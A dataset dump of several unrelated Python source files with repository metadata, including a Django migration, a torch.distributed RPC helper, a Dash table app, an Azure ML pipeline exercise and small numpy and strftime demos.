def testMakeEventSubsitution(self):
self._log.debug( "\ntestMakeEventSubsitution" )
newEvent = makeNewEvent(
{ 'type':'%(Newtype)s',
'source':'%(Newsource)s',
'other_data':{'data':'data','data1':'TEST%(Subdata)sTEST','data2':'data2' },
},
makeEvent('oldType', 'oldSource', {'data1':'olddata1','Newtype':'SubType','Newsource':'SubSource','Subdata':'SUBBEDDATA'} ),
{'data2':'xtradata2'} )
print newEvent
self.assertNotEqual( newEvent, None)
self.assertEqual( newEvent.getType(), "SubType" )
self.assertEqual( newEvent.getSource(), "SubSource" )
od = newEvent.getPayload()
self.assertEqual( od['data'], "data" )
self.assertEqual( od['data1'], "TESTSUBBEDDATATEST" )
def testDummy(self):
return
from MiscLib import TestUtils
def getTestSuite(select="unit"):
"""
Get test suite
select is one of the following:
"unit" return suite of unit tests only
"component" return suite of unit and component tests
"all" return suite of unit, component and integration tests
"pending" return suite of pending tests
name a single named test to be run
"""
testdict = {
"unit":
[
"testMakeEvent",
"testMakeEventSubsitution"
],
"component":
[ "testDummy"
],
"integration":
[ "testDummy"
],
"pending":
[ "testDummy"
]
}
return TestUtils.getTestSuite(TestUtilsUnit, testdict, select=select)
# Run unit tests directly from command line
if __name__ == "__main__":
TestUtils.runTests("TestUtils.log", getTestSuite, sys.argv)
| [
"github@lklyne.co.uk"
] | github@lklyne.co.uk |
5599614cd850830f9c0dd4726214b6fcd123965e | 783bda14ef99024acea3584bc19130375fec2508 | /04_02_Start.py | 5a73e134a03fdfaf2edc1910586ae2106d72afdf | [] | no_license | liberbell/opendata01 | 75d4ed22f54fb42112b02244c9bf2cfad08935ca | f1b7c33e6f61d7ca4f01cc96c4ce05c4f6fb78bf | refs/heads/master | 2020-03-21T10:25:08.678066 | 2018-08-21T00:21:09 | 2018-08-21T00:21:09 | 138,449,774 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | # Getting more control over formatting
from datetime import datetime
now = datetime.now()
print(now.strftime('%a %A %d'))
print(now.strftime('%b %B %m'))
print(now.strftime('%a %B %D'))
print(now.strftime('%H : %M : %S %p'))
print(now.strftime('%y %Y'))
| [
"liberbell@gmail.com"
] | liberbell@gmail.com |
bbab7556f06dd799a7a1c6cda3bc61ee1edfe69d | 5f98e7c49e88ed0f1c6ea306de7d1a325129a253 | /other_peoples_apps/basic_dash/dash3.py | 44997a2911358a6521ac3b1c0d58f001d0ecfcf0 | [] | no_license | simongarisch/basic_flask | d1e4c4dd8f4dc86e5603c9b4fc75dc6b455cdd48 | 5cdc5dc45a3a7c838b732e8fd068a28018f69475 | refs/heads/master | 2021-07-14T20:03:50.156056 | 2020-06-19T12:03:11 | 2020-06-19T12:03:11 | 172,444,123 | 1 | 0 | null | 2021-06-22T11:06:49 | 2019-02-25T06:04:07 | Python | UTF-8 | Python | false | false | 965 | py | import dash
import dash_core_components as dcc
import dash_html_components as html
import pandas as pd
df = pd.read_csv('https://gist.githubusercontent.com/chriddyp/c78bf172206ce24f77d6363a2d754b59/raw/c353e8ef842413cae56ae3920b8fd78468aa4cb2/usa-agricultural-exports-2011.csv')
def generate_table(dataframe, max_rows=10):
return html.Table([
html.Thead(
html.Tr([html.Th(col) for col in dataframe.columns])
),
html.Tbody([
html.Tr([
html.Td(dataframe.iloc[i][col]) for col in dataframe.columns
]) for i in range(min(len(dataframe), max_rows))
])
])
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
app.layout = html.Div(children=[
html.H4(children='US Agriculture Exports (2011)'),
generate_table(df)
])
if __name__ == '__main__':
app.run_server(debug=True)
| [
"gatman946@gmail.com"
] | gatman946@gmail.com |
392882b39640d468c4b7d572a0d0d27040cbf237 | ff4fe07752b61aa6404f85a8b4752e21e8a5bac8 | /challenge-064/lubos-kolouch/python/ch-2.py | df2d2041c3bf0af4f2b2c7edaa47e508d404a077 | [] | no_license | choroba/perlweeklychallenge-club | 7c7127b3380664ca829158f2b6161c2f0153dfd9 | 2b2c6ec6ece04737ba9a572109d5e7072fdaa14a | refs/heads/master | 2023-08-10T08:11:40.142292 | 2023-08-06T20:44:13 | 2023-08-06T20:44:13 | 189,776,839 | 0 | 1 | null | 2019-06-01T20:56:32 | 2019-06-01T20:56:32 | null | UTF-8 | Python | false | false | 729 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from typing import List
def word_sequence(S: str, W: List[str]) -> List[str]:
def helper(s: str, words: List[str]) -> List[str]:
if not s:
return words
for word in W:
if s.startswith(word):
result = helper(s[len(word):], words + [word])
if result:
return result
return []
result = helper(S, [])
return result if result else [0]
S1 = "perlweeklychallenge"
W1 = ["weekly", "challenge", "perl"]
S2 = "perlandraku"
W2 = ["python", "ruby", "haskell"]
print(word_sequence(S1, W1)) # Output: ['perl', 'weekly', 'challenge']
print(word_sequence(S2, W2)) # Output: [0]
| [
"lubos@kolouch.net"
] | lubos@kolouch.net |
1df25303d1c26a2dab78b3710ad8715b1f99e1d7 | ec78f8ab63aec0753b9360715a4276a971b78a82 | /py/data_analysis/np/b_indexing.py | f4b2c805ca8dc1f3bc734fb3f68db8f06f0173bc | [] | no_license | anderscui/ml | 4ace7e7b8cf248042d224bd54e81b691963b2e0e | 39238ba6d802df7e8bf1089ef3605cfc83b333ac | refs/heads/master | 2021-06-03T16:09:55.207202 | 2018-11-01T18:50:49 | 2018-11-01T18:50:49 | 23,989,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 402 | py | import numpy as np
from numpy.random import randn
names = np.array(['Bob', 'Joe', 'Will', 'Bob', 'Will', 'Joe', 'Joe'])
data = randn(7, 4)
print(names)
print(data)
print(names == 'Bob')
print(data[names == 'Bob'])
print(data[names == 'Bob', 2:])
print(data[names != 'Bob'])
print(data[-(names == 'Bob')])
mask = (names == 'Bob') | (names == 'Will')
print(data[mask])
data[data < 0] = 0
print(data) | [
"anderscui@gmail.com"
] | anderscui@gmail.com |
a7ab3031e7812b193439335991eaa94fd5f32407 | 94e964496acd225e1a04060a9bc9f639e6cff99c | /app/invitations/urls.py | 30974ba9c9a16fa13ba9b7f1760d580f40cb79b6 | [] | no_license | indigocodeit/conflictcartographer | 64b6ab2c991cd3ad020c4832cdb26974d342b564 | ab19b4559c1e016ef485bfa1a01df17fb15679ce | refs/heads/master | 2023-03-05T00:44:03.805241 | 2021-02-19T08:50:23 | 2021-02-19T08:50:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 759 | py |
from django.urls import path, include
from django.conf.urls import url
from invitations.views import referralRedirect, referralSignup, handleExcelFile,fileuploadMenu, emailpreview,share
urlpatterns =[
path("accounts/",include("django.contrib.auth.urls")),
url("accounts/ref/(?P<refkey>[^/.]+)/$",referralRedirect, name="referral"),
url("accounts/signup",referralSignup, name="referralSignup"),
#path("accounts/signup",signup,name = "signup"),
#path("accounts/bulkadd/",bulkAdd,name="bulkadd"),
path("upload/invexcel/", handleExcelFile, name = "uploadexcel"),
path("fileupload/", fileuploadMenu, name = "fileupload"),
path("admin/invitations/emailpreview/<int:pk>/", emailpreview),
path("api/share/",share,name="share")
]
| [
"pglandsverk@gmail.com"
] | pglandsverk@gmail.com |
b3ce5a872a19efb4767bc6923d50fc1851771e87 | 20348bd6e61f7019a696f2497a7b3c5c2d192796 | /wowmode/admin.py | 5851758c22a57ac5451904cdf44597e7f7843cf6 | [] | no_license | hypnopompicindex/cms | fa9c3e70de71744506d1d4ccb3bf24a3b82e8b4d | 81a634ca493385000e7028de632c5d9d04eeddaa | refs/heads/master | 2021-06-26T23:05:16.022544 | 2019-04-01T04:21:26 | 2019-04-01T04:21:26 | 128,445,653 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 660 | py | from django.contrib import admin
from .models import Videolist, Video
from adminsortable2.admin import SortableAdminMixin, SortableInlineAdminMixin
class VideoInline(SortableInlineAdminMixin, admin.TabularInline):
model = Video
readonly_fields = ('thumbnail', 'title')
fields = ('order', 'title', 'file', 'thumbnail')
template = "admin/wowmode/edit_inline/tabular.html"
@admin.register(Videolist)
class VideolistAdmin(SortableAdminMixin, admin.ModelAdmin):
list_display = ['title', 'start_date', 'end_date', 'active']
list_editable = ('active',)
fields = ('title', 'start_date', 'end_date', 'active')
inlines = [VideoInline] | [
"hypnopompicindex@gmail.com"
] | hypnopompicindex@gmail.com |
9dc0dba873157557aab7cbf28ec4ecb79b96e2db | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_revenue.py | d5ed97ac2bac6f928e632369e308122c3f31872d | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 342 | py |
#calss header
class _REVENUE():
def __init__(self,):
self.name = "REVENUE"
self.definitions = [u'the income that a government or company receives regularly: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
2284e877ba7253ab2c2663b4f0763d61698a085c | 9fae6f56ff77217aca8ae405a2bb2a2245461cc4 | /backend/taxi_profile/migrations/0001_initial.py | 19e1622e12af2de40a9c5cc0f883cee8ec77539c | [] | no_license | crowdbotics-apps/ready-18854 | 7c554b307dcab02274c10e31264712f607f6f01a | e37d0a3d3909b6defe071ffd9026511ae20db53c | refs/heads/master | 2022-11-06T22:56:45.127940 | 2020-07-13T02:29:07 | 2020-07-13T02:29:07 | 279,189,411 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,582 | py | # Generated by Django 2.2.14 on 2020-07-13 02:28
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('mobile_number', models.CharField(blank=True, max_length=20, null=True)),
('photo', models.URLField(blank=True, null=True)),
('status', models.CharField(blank=True, max_length=50, null=True)),
('timestamp_created', models.DateTimeField(auto_now_add=True, null=True)),
('last_updated', models.DateTimeField(auto_now=True, null=True)),
('last_login', models.DateTimeField(blank=True, null=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='userprofile_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Notification',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(max_length=20)),
('message', models.TextField()),
('timestamp_created', models.DateTimeField(auto_now_add=True)),
('users', models.ManyToManyField(related_name='notification_users', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='InviteCode',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('code', models.CharField(max_length=20)),
('timestamp_created', models.DateTimeField(auto_now_add=True)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invitecode_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='DriverProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('mobile_number', models.CharField(max_length=20)),
('photo', models.URLField()),
('driver_status', models.CharField(max_length=50)),
('timestamp_created', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('last_login', models.DateTimeField()),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='driverprofile_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Document',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('file', models.URLField()),
('description', models.TextField(blank=True, null=True)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='document_user', to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
4dbe179017640dc1772bf32986f395dcfe46257c | c36679186f669c6e3bd1c106c96d4a17be1f5ab1 | /Practice_Anisul/149.py | 0787f34ea6607e53a80621276df0598ec6b76a36 | [] | no_license | touhiduzzaman-tuhin/python-code-university-life | 60a3d671b200a6f5222c6d176c13c5f20f013509 | 6d2e3d90d430faa5c83fe79e7fb1ebe516994762 | refs/heads/master | 2023-03-22T15:18:10.636203 | 2021-03-06T18:52:04 | 2021-03-06T18:52:04 | 332,467,190 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 191 | py | tpl = (
1,
3,
6,
4,
"Tuhin",
"Rana",
(1, 2, 3)
)
print(tpl)
print(tpl[0])
print(tpl[1])
print(tpl[2])
print(tpl[3])
print(tpl[4])
print(tpl[6])
print(tpl[6][1]) | [
"touhiduzzamantuhin95@gmail.com"
] | touhiduzzamantuhin95@gmail.com |
b06ce99b3d9241be378b1a68cabcf4a2a08191f0 | d91365b9da3cbd3a4c928591f25e55e615a61ebb | /torchbiggraph/rpc.py | f8cf4cc00eeb223c99249d384e23d4f10febd204 | [
"BSD-3-Clause"
] | permissive | pandeyankit83/PyTorch-BigGraph | 052ff88804bba8353a12385c5547445cdb22700b | 79e7fc06621ca7737689fa50c1e6cf6cea550a90 | refs/heads/master | 2022-12-05T02:16:52.169026 | 2020-06-22T17:29:36 | 2020-06-22T17:30:44 | 277,336,532 | 3 | 1 | NOASSERTION | 2022-11-27T03:29:15 | 2020-07-05T16:04:10 | Python | UTF-8 | Python | false | false | 5,714 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import io
import sys
import traceback
import numpy as np
import torch
import torch.distributed as td
# FIXME: is it efficient to torch.save into a buf? It's going to have to copy
# all the tensors.
def _serialize(data):
buf = io.BytesIO()
torch.save(data, buf)
data_bytes = buf.getvalue()
# FIXME: how to properly copy bytes to ByteTensor?
t = torch.from_numpy(np.frombuffer(data_bytes, dtype=np.uint8))
return t
def _deserialize(t):
data_bytes = t.numpy().tobytes()
buf = io.BytesIO(data_bytes)
return torch.load(buf)
def send(data, dst):
"""
Sends an arbitrary torch-serializable object to a destination node.
This is a blocking send, equivalent to `torch.distributed.send`.
Args:
data: An arbitrary torch-serializable object to be sent.
dst: The rank of the destination node.
"""
# FIXME: we've got to get rid of this two-pass nonsense for dynamically sized
# send and receive.
t = _serialize(data)
sizet = torch.LongTensor([t.nelement()])
td.send(sizet, dst)
td.send(t, dst)
def recv(src=None):
"""
Receives an arbitrary torch-serializable object from a source node.
This is a blocking receive, `torch.distributed.recv`
Args:
src: The rank of the source node. If None, will receive from any rank.
Returns:
data: The data send from the source node.
src: The rank of the source node.
"""
sizet = torch.LongTensor(1)
src = td.recv(sizet, src)
t = torch.ByteTensor(sizet.item())
td.recv(t, src)
return _deserialize(t), src
_JOIN_KEY = "seU17sb9nwqDZhsH9AyW"
class Server(object):
"""Base class for an RPC server using `torch.distributed`.
Users should subclass this class and add the server methods.
Example:
init_method = "file://myfile.tmp"
num_clients = 1
torch.distributed.init_process_group('gloo',
init_method=init_method,
world_size=num_clients + 1,
rank=0)
class MyServer(Server):
def test_func(self, T, k=0):
return ("the result is ", T + k)
s = MyServer(num_clients)
s.start() # will block until all clients have called `join()`
"""
def __init__(self, num_clients):
"""
Args:
num_clients: The number of clients that will call `join()` upon
completion.
"""
self.num_clients = num_clients
def start(self, groups=None):
join_clients = []
while True:
rpc, src = recv()
if rpc == _JOIN_KEY:
join_clients += [src]
if len(join_clients) == self.num_clients:
for client in join_clients:
# after sending the join cmd,
# each client waits on this ack to know everyone is done
# and it's safe to exit
send(_JOIN_KEY, client)
break
else:
F, args, kwargs = rpc
try:
res = getattr(self, F)(*args, **kwargs)
send((False, res), src)
except BaseException as e:
# should we print the exception on the server also?
# traceback.print_exc()
exc_str = traceback.format_exc()
send((True, (e, exc_str)), src)
class Client(object):
"""A client for connecting to a subclass of `rpc.Server`.
Example:
init_method = "file://myfile.tmp"
num_clients = 1
torch.distributed.init_process_group('gloo',
init_method=init_method,
world_size=num_clients + 1,
rank=1)
c = Client(MyServer, server_rank=0)
print(c.test_func(torch.arange(0, 3), k=2))
# ('the result is ', tensor([ 2, 3, 4]))
c.join()
"""
def __init__(self, server_class, server_rank):
"""
Args:
server_class: The class of the server object. This should be a
subclass of `rpc.Server`.
server_rank: The rank of the node where the `rpc.Server` is running.
"""
self.server_class = server_class
self.server_rank = server_rank
def __getattr__(self, name):
if name not in dir(self.server_class):
raise AttributeError(
"%s has no attribute %s" % (self.server_class.__name__, name)
)
func = getattr(self.server_class, name)
if not isinstance(func, type(lambda: 1)): # FIXME
raise TypeError("%s object is not callable" % (type(func)))
def inner(*args, **kwargs):
send((name, args, kwargs), self.server_rank)
(is_exception, res), _src = recv(self.server_rank)
if not is_exception:
return res
else:
exc, exc_str = res
print(exc_str, file=sys.stderr)
raise exc
return inner
def join(self):
"""Should be called by each client upon completion, to ensure a clean exit.
"""
send(_JOIN_KEY, self.server_rank)
recv(self.server_rank)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
b21d14a806472b97f7bf97745f271b6370e98277 | 8520c991dc543f5f4e1efe59ab401824173bb985 | /63-unique-paths-ii/solution.py | dea9fccf6e2786fb22f3e04e49bad454437956f9 | [] | no_license | katryo/leetcode | d44f70f2853c4f5ea9a462d022feb0f5436c2236 | 0da45559271d3dba687858b8945b3e361ecc813c | refs/heads/master | 2020-03-24T12:04:53.859047 | 2020-02-18T04:27:55 | 2020-02-18T04:27:55 | 142,703,107 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,783 | py | # A robot is located at the top-left corner of a m x n grid (marked 'Start' in the diagram below).
#
# The robot can only move either down or right at any point in time.
# The robot is trying to reach the bottom-right corner of the grid (marked 'Finish' in the diagram below).
#
# Now consider if some obstacles are added to the grids. How many unique paths would there be?
# An obstacle and empty space is marked as 1 and 0 respectively in the grid.
#
# Note: m and n will be at most 100.
#
# Example 1:
#
# Input:
# [
# [0,0,0],
# [0,1,0],
# [0,0,0]
# ]
# Output: 2
# Explanation:
# There is one obstacle in the middle of the 3x3 grid above.
# There are two ways to reach the bottom-right corner:
# 1. Right -> Right -> Down -> Down
# 2. Down -> Down -> Right -> Right
class Solution(object):
def uniquePathsWithObstacles(self, obstacleGrid):
"""
:type obstacleGrid: List[List[int]]
:rtype: int
"""
if not obstacleGrid:
return 0
if not obstacleGrid[0]:
return 0
table = [[-1] * len(obstacleGrid[0]) for _ in range(len(obstacleGrid))]
table[0][0] = 1
def paths(row, col):
if row < 0 or col < 0 or row >= len(obstacleGrid) or col >= len(obstacleGrid[0]):
return 0
if obstacleGrid[row][col]:
return 0
if table[row][col] != -1:
return table[row][col]
ret = paths(row-1, col) + paths(row, col-1)
table[row][col] = ret
return ret
ans = paths(len(obstacleGrid)-1, len(obstacleGrid[0])-1)
return ans
# s = Solution()
# grid = [
# [0, 0, 0],
# [0, 1, 0],
# [0, 0, 0],
# [1, 0, 0]
# ]
# print(s.uniquePathsWithObstacles(grid))
| [
"katoryo55@gmail.com"
] | katoryo55@gmail.com |
a311f00d4d3dc50b38cd6be0089d3287ffd215ea | 53b307ed3c23c08ad95c46e4ed1b79ceb8cd3fe9 | /panels/apps.py | 7f4399c55c7fb010e218dd443330883d083231cd | [
"MIT"
] | permissive | mesebilisim/iotdashboard | e14fc66ecf03d109f01f5fc9253003dd676680cf | 2e974d55015071f61e3d990f0d63d756a4763c24 | refs/heads/master | 2020-05-23T11:15:56.599010 | 2017-07-12T10:07:21 | 2017-07-12T10:07:21 | 68,567,736 | 0 | 0 | null | 2016-09-19T03:58:14 | 2016-09-19T03:58:14 | null | UTF-8 | Python | false | false | 128 | py | from __future__ import unicode_literals
from django.apps import AppConfig
class PanelsConfig(AppConfig):
name = 'panels'
| [
"electrocoder@gmail.com"
] | electrocoder@gmail.com |
82ce6bb03f39e5756d72aef556a8417aa39e95cc | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_083/ch77_2020_04_22_18_33_29_505824.py | 5dc8be2d1349c4c3b224e2d146ccfba098fc6d3c | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py | def calcula_tempo(dnomes_aceleração):
novodic={}
V=[]
tempo=[]
for i in range(len(dnomes_aceleração)) and a in dnomes_aceleração.values():
tempo=(V[i])/a[i]
novodic=nome[tempo]
return novodic | [
"you@example.com"
] | you@example.com |
e0aec4b793d9baf3e77815a97b1a6fcda4f09d46 | 2ce27b05f45cef6ce3ae5c02b8e83e548def2fc6 | /ADVANCE/Modules/Renaming the module.py | 3ec25656a999a01846ceee8a874dac28e2766867 | [] | no_license | Ajay2521/Python | 775b7d99736e83e4d0c37302b91d1413dd2c0d3b | a426dd7717de8a5e60e584d208ae7120bb84c1b3 | refs/heads/master | 2022-12-01T17:49:12.672061 | 2020-08-15T14:55:12 | 2020-08-15T14:55:12 | 273,632,074 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 848 | py | # lets see about "Renaming a Modules" in python.
# It is possible to import the module by using specific user defined name called as "alias name".
# It is posssibile to access the functionality of the module by using its "alias name" which was declared while importing the module.
# Syntax for renaming a module is:
# import moduleName as aliasName
# Here is the program which is used to import module "Calculate.py" by using an alias name.
import Calculate as Cal
# Getting user input for variables a and b.
a = int( input ( "\nEnter a value for \"a\" : " ) )
b = int( input ( "\nEnter a value for \"b\" : " ) )
# Accessing the functionality present in the module "Calculate" using alias name by using dot( . ) operator.
Cal.Add( a, b)
Cal.Multi( a,b )
print( ) # Used to print new line for readability. | [
"noreply@github.com"
] | Ajay2521.noreply@github.com |
96a80deed9c0cdafbb52abf608c43ee8b5a7308a | cf4c9b102ab3a2720a045ad0b4c0b1d610738102 | /shrike-examples/pipelines/experiments/demo_chain_components.py | a82c9bfd1775806779047e1a23422ef47d93bb33 | [
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | isabella232/azure-ml-problem-sets | a7c0b0070b08598e5f473c91e47cad1fc3525a9b | 5e6a3227032e51bb224a1085dc4f9ee9f8bd1dcf | refs/heads/main | 2023-07-12T11:49:58.465710 | 2021-08-12T17:02:11 | 2021-08-12T17:02:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,297 | py | """
The Azure ML pipeline that demonstrates how to chain components together.
to execute:
> python pipelines/experiments/demo_chain_components.py --config-dir pipelines/config --config-name experiments/demo_chain_components run.submit=True
"""
# pylint: disable=no-member
# NOTE: because it raises 'dict' has no 'outputs' member in dsl.pipeline construction
import os
import sys
from dataclasses import dataclass
from typing import Optional
from azure.ml.component import dsl
from shrike.pipeline.pipeline_helper import AMLPipelineHelper
# NOTE: if you need to import from pipelines.*
ACCELERATOR_ROOT_PATH = os.path.abspath(
os.path.join(os.path.dirname(__file__), "..", "..")
)
if ACCELERATOR_ROOT_PATH not in sys.path:
print(f"Adding to path: {ACCELERATOR_ROOT_PATH}")
sys.path.append(str(ACCELERATOR_ROOT_PATH))
class ChainComponentsDemo(AMLPipelineHelper):
"""Runnable/reusable pipeline helper class
This class inherits from AMLPipelineHelper which provides
helper functions to create reusable production pipelines.
"""
def build(self, config):
"""Builds a pipeline function for this pipeline using AzureML SDK (dsl.pipeline).
This method returns a constructed pipeline function (decorated with @dsl.pipeline).
Args:
config (DictConfig): configuration object
Returns:
dsl.pipeline: the function to create your pipeline
"""
# helper functions below load the subgraph/component from registered or local version depending on your config.run.use_local
probe_component = self.component_load("probe")
# Here you should create an instance of a pipeline function (using your custom config dataclass)
@dsl.pipeline(
name="demo-chain-components",
description="The Azure ML demo of a graph where components are chained, i.e. the input of a component is the output of an upstream component.",
default_datastore=config.compute.compliant_datastore,
)
def demo_pipeline_function(probe_dataset):
"""Pipeline function for this graph.
Args:
probe_dataset (FileDataset): input dataset (usually obtained through extraction from Heron portal)
Returns:
dict[str->PipelineOutputData]: a dictionary of your pipeline outputs
for instance to be consumed by other graphs
"""
# general syntax:
# module_instance = module_class(input=data, param=value)
# or
# subgraph_instance = subgraph_function(input=data, param=value)
probe_component_step_1 = probe_component(
input_data=probe_dataset,
scan_args=config.probe1.scan_args,
scan_deps=config.probe1.scan_deps,
scan_input=config.probe1.scan_input,
scan_env=config.probe1.scan_env,
verbose=config.probe1.verbose,
)
self.apply_recommended_runsettings(
"probe", probe_component_step_1, gpu=True
)
probe_component_step_2 = probe_component(
input_data= # To-Do: this is where you need to connect teh output from the first probe component
scan_args=config.probe2.scan_args,
scan_deps=config.probe2.scan_deps,
scan_input=config.probe2.scan_input,
scan_env=config.probe2.scan_env, # here we're using a different parameter
verbose=config.probe2.verbose,
)
self.apply_recommended_runsettings(
"probe", probe_component_step_2, gpu=True
)
# return {key: output}
return {"subgraph_results": probe_component_step_2.outputs.results}
# finally return the function itself to be built by helper code
return demo_pipeline_function
def pipeline_instance(self, pipeline_function, config):
"""Given a pipeline function, creates a runnable instance based on provided config.
This is used only when calling this as a runnable pipeline using .main() function (see below).
The goal of this function is to map the config to the pipeline_function inputs and params.
Args:
pipeline_function (function): the pipeline function obtained from self.build()
config (DictConfig): configuration object
Returns:
azureml.core.Pipeline: the instance constructed with its inputs and params.
"""
# NOTE: self.dataset_load() helps to load the dataset based on its name and version
pipeline_input_dataset = self.dataset_load(
name=config.inputs.input_data,
version=config.inputs.input_data_version,
)
# when all inputs are obtained, we call the pipeline function
probe_pipeline = pipeline_function(probe_dataset=pipeline_input_dataset)
# and we return that function so that helper can run it.
return probe_pipeline
# NOTE: main block is necessary only if script is intended to be run from command line
if __name__ == "__main__":
# calling the helper .main() function
ChainComponentsDemo.main()
# comment to bypass caching
| [
"noreply@github.com"
] | isabella232.noreply@github.com |
bdd46ea024647f32161f4a683728f074d4063515 | 3ec3de2e1bdfe2890084f15ac4b0f0714aeff096 | /collective/elasticsearch/brain.py | 96b5288c5a80a83427d9c29de053589df5f03708 | [] | no_license | eea/collective.elasticsearch | 7d6afc0b5f66810ab7b3a6b8aa1835a187a07f7e | baaaa73245b4866936383b001f0dda17ad991846 | refs/heads/master | 2023-08-01T03:34:51.375866 | 2013-06-06T15:42:01 | 2013-06-06T15:42:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,008 | py | from Acquisition import Implicit, aq_get
from Products.ZCatalog.interfaces import ICatalogBrain
from zope.interface import implements
from zope.globalrequest import getRequest
from Products.CMFPlone.utils import pretty_title_or_id
from collective.elasticsearch.ejson import loads
_marker = []
class Brain(Implicit):
"""
A special brain implementation that uses the results
from elasticsearch to load the brain.
"""
implements(ICatalogBrain)
__allow_access_to_unprotected_subobjects__ = True
def __init__(self, data, catalog):
self._idata = data
self._raw_data = self._idata['_metadata']
self._data = None
self._catalog = catalog
@property
def data(self):
if self._data is None:
self._data = loads(self._raw_data)
return self._data
def has_key(self, key):
return key in self.data
__contains__ = has_key
@property
def pretty_title_or_id(self):
return pretty_title_or_id(self._catalog, self)
def __getattr__(self, name, default=_marker):
if name == 'REQUEST':
request = aq_get(self._catalog, 'REQUEST', None)
if request is None:
request = getRequest()
return request
elif name[0] == '_':
try:
return self.__dict__[name]
except KeyError:
if default == _marker:
raise AttributeError(name)
else:
return default
if name in self.data:
return self.data[name]
elif name.startswith('portal_'):
# XXX really ugly...
return aq_get(self._catalog, name)
def getPath(self):
return '/'.join(self.getRawPath())
def getRawPath(self):
try:
# need to convert to string because we get
# unicode from elastic
path = self.data['_path']
newpath = []
for part in path:
newpath.append(str(part))
return tuple(newpath)
except KeyError:
return ()
def getURL(self, relative=0):
request = aq_get(self._catalog, 'REQUEST', None)
if request is None:
request = getRequest()
return request.physicalPathToURL(self.getPath(), relative)
def _unrestrictedGetObject(self):
return self._catalog.unrestrictedTraverse(self.getPath())
def getObject(self, REQUEST=None):
path = self.getRawPath()
if not path:
return None
if len(path) > 1:
parent = self._catalog.unrestrictedTraverse(path[:-1])
else:
return ''
return parent.restrictedTraverse(path[-1])
def getRID(self):
"""Return the record ID for this object."""
return self.data.get_id()
def BrainFactory(catalog):
def factory(result):
brain = Brain(result, catalog)
return brain.__of__(catalog)
return factory
| [
"vangheem@gmail.com"
] | vangheem@gmail.com |
95782f795681aa0df4a8250fe3ef599924447b85 | 9c7958f4c55d33d8bb0175600f169c060aa11f6f | /scripts/motifplot.py | ad3e8622dea75d1e259bb09292c37938b7b13e2b | [] | no_license | knutdrand/snakemakes | a245de79119dc0dc982f85e846149e3754ef64a9 | 9dd2355271d3da8d4767f7dac877f65f62d1aa9b | refs/heads/master | 2021-03-29T07:52:44.110983 | 2020-10-09T13:27:45 | 2020-10-09T13:27:45 | 247,933,836 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py | import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import numpy as np
get_name = lambda parts: f"{parts[0]}:{parts[1]}-{parts[2]}"
matches = {line.split("\t")[2] for line in open(snakemake.input[0]) if not line.startswith("#") and line.strip()}
hits = [get_name(line.split()) in matches for line in open(snakemake.input[1])]
ratio = np.cumsum(hits)/np.arange(1, len(hits)+1)
plt.plot(ratio)
